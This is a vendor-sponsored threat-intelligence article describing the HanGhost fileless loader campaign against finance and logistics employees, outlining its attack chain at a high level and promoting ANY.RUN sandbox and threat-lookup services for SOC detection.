Disclosure: This article was provided by ANY.RUN. The information and analysis presented are based on their research and findings.
A new malware campaign built around the HanGhost loader is actively targeting corporate environments, focusing on employees involved in payments, logistics, and contract operations. The attack is designed to operate without leaving clear artifacts, allowing it to reach systems linked to revenue and operations before being fully analyzed.
The campaign has already shown multiple waves of activity with different malware families, indicating active development and scaling rather than a one-off attack.
How the Attack Unfolds and Why Most SOCs See It Too Late
The attack chain combines multiple techniques that individually look benign but together create a highly evasive execution flow.
See full attack analysis inside the ANY.RUN sandbox
It starts with obfuscated JavaScript that executes hidden PowerShell commands. These commands execute a .NET loader directly in memory, which then retrieves a seemingly harmless image file containing an encrypted payload. The payload is extracted and executed without ever being written to disk.
This chain is used to deliver multiple malware families, including PureHVNC, XWorm, Meduza, AgentTesla, and Phantom, with some cases also deploying UltraVNC for persistent remote access.
This results in alerts that are either low priority or lack enough context, which slows down triage and delays response.
Attackers Are Targeting Finance and Operations Roles in Businesses
The targeting model is deliberate. Instead of aiming at infrastructure or privileged admins, attackers focus on users who interact with financial processes and operational systems on a daily basis.
These users regularly execute scripts, open attachments, and communicate externally, which makes malicious activity harder to distinguish from normal behavior. Once compromised, their access can be used to influence transactions, documents, and internal workflows.
- Persistent remote access: Tools like PureHVNC and XWorm allow continuous monitoring and control
- Payment systems exposure: Attackers can intercept or modify transaction details during execution
- Contract manipulation risk: Access to documents and email threads enables unauthorized changes or fraud
- Logistics disruption: Compromised workflows can delay shipments and break operational processes.
The impact is linked directly to how these roles interact with business processes, not just system access.
3 Steps CISOs Need to Take to Detect and Stop HanGhost Early
Stopping HanGhost requires changing how triage, response, and threat hunting actually work under pressure. The attack succeeds because teams spend too much time validating signals and not enough time understanding behavior early.
Fix Triage to Show Behavior, Not Indicators
Analysts cannot rely on hashes, domains, or reputation for this type of attack because most of the chain runs in memory and constantly changes. Triage has to start with execution.
Suspicious files, scripts, and links need to be detonated immediately in an interactive sandbox so the team can see the real process chain, network activity, and hidden stages.
ANY.RUN’s Interactive Sandbox provides SOC teams with a fast, integration-ready solution for detecting malware & phishing attacks inside fully interactive virtual environments across Windows, macOS, Linux, and Android.
Thanks to the advanced detection capabilities, Tier 1 analysts are able to quickly validate alerts, emails, files, and URLs in minutes and ensure a short MTTR to prevent the attack from evolving into a business security breach.
Rebuild Response Around the Full Execution Chain
Containment decisions cannot be based on isolated alerts or single indicators. Teams need to see the full execution chain, from the initial script to the final payload, and use that to define scope and response actions.
Threat intelligence connects infrastructure, behaviors, and related activity, allowing responders to understand how far the attack may have spread and what needs to be blocked beyond the initial entry point.
Turn Threat Hunting into a Continuation of Real Incidents
Threat hunting should not rely on generic techniques when dealing with active campaigns like this. It needs to start from confirmed behavior observed during triage and response.
Once one case is identified, teams should immediately search for the same execution patterns across the environment and use threat intelligence to identify related activity seen in other organizations. ANY.RUN’s TI Lookup provides SOC teams with the latest attack intel from 15,000 organizations, delivering instant, actionable context on over 40 types of IOCs and giving an industry and geo threat landscape view.
This expands detection coverage and reduces the chance of missed compromises.
When combined, these capabilities shift SOC operations from reactive validation to proactive understanding. That shift is what reduces dwell time, lowers incident cost, and prevents attacks from reaching business-critical systems.
Conclusion
HanGhost uses a multi-stage, fileless execution chain to deliver remote access malware and credential stealers while avoiding traditional detection. By combining obfuscated scripts, in-memory loaders, and payloads hidden inside image files, it allows attackers to reach systems linked to payments, contracts, and operations without leaving clear artifacts.
To stop this type of attack early, SOC teams need to execute suspicious files and scripts in a controlled environment to expose real behavior, and use real-time threat intelligence to understand how the activity connects to ongoing campaigns. This allows teams to detect the attack earlier, scope it correctly, and respond before it spreads further.
